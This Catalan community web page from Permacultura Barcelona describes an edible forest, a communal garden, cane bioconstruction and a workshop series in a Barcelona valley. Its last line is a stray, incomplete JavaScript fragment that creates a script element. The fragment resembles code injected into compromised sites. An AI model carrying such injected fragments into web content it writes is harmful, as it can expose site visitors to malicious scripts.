Permacultura

Permacultura Barcelona dinamitza a la vall quatre projectes:

  • Bosc comestible
  • Hort Permacomunal
  • Bioconstrucció
  • Cicle de tallers al PIC

1-El bosc comestible és un ecosistema que produeix aliments i altres productes de gran utilitat com llenya o plantes medicinals. La idea d’un bosc comestible es crear un sistema perenne amb un manteniment mínim que permet l’estalvi d’aigua, energia i diners, però sobretot crea bellesa, benestar, salut i contribueix a incrementar la biodiversitat i frenar l’escalfament de la Terra. El bosc dona forma concreta a una de les propostes sorgides del procés de participació veïnal sobre el futur de la vall, en el marc de la campanya Baixem Collserola a la ciutat, Defensem la solana, motivat per l’anunci municipal d’obrir “16 portes” a la serra i guanyador del concurs d’idees municipal.

2-L’hort permacomunal es un espai verd reconvertit en un petit ecosistema per a la producció d’aliments, el reciclatge de residus i l’atracció de la biodiversitat. Un espai d’experimentació creat en col.laboració amb Permablitz.

3-L’espai de bioconstrucció amb canya, impulsat junt amb Investigació Canyera de l’ESFA i gent de la comunitat de Can Masdeu, s’ha concretat en una estructura feta amb la tècnica de canya viva que servirà per dotar d’un nou espai al centre social.

4-El cicle de tallers es una col.laboració regular de Permacultura Barcelona amb el PIC, aportant tallers vinculats amb temàtiques d’agricultura, bioconstrucció, jardineria i altres temes que interessen als permacultors. Les jornades de treball es fan els dissabtes i alguns dimecres. Son obertes i t’hi pots sumar. Si tens dubtes, contacta previament. info@permacultura-bcn.org / Facebook / Pàgina web

var d=document;var s=d.createElement(‘script’);